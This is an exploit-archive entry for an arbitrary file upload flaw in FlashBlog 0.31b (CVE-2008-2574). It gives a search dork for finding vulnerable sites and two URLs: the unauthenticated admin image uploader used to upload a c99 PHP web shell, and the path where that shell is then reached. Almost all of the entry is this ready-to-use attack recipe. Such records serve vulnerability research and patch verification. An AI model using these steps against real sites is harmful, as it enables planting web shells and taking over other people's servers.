FlashBlog 0.31b - Arbitrary File Upload
Author: ilker Kandemir
type: webapps
platform: php
port:
date_added: 2008-06-02
date_updated:
verified: 1
codes: OSVDB-46314;CVE-2008-2574
tags:
aliases:
screenshot_url:
application_url:
FlashBlog beta0.31 Remote File Upload Vulnerability
# Author : ilker kandemir a.k.a MEFISTO
# Dork : inurl:flashblog.html or inurl:/flashblog/
# Website : www.dumenci.net, www.coderx.org
http://[site.com]/admin/Editor/imgupload.php ==>>> upload your c99 shell
http://[site.com]/tus_imagenes/c99.php ==>>> your address
Tnx: Dumenci, Damar, Cr@zy_king, Str0ke and all my friendz
# milw0rm.com [2008-06-03]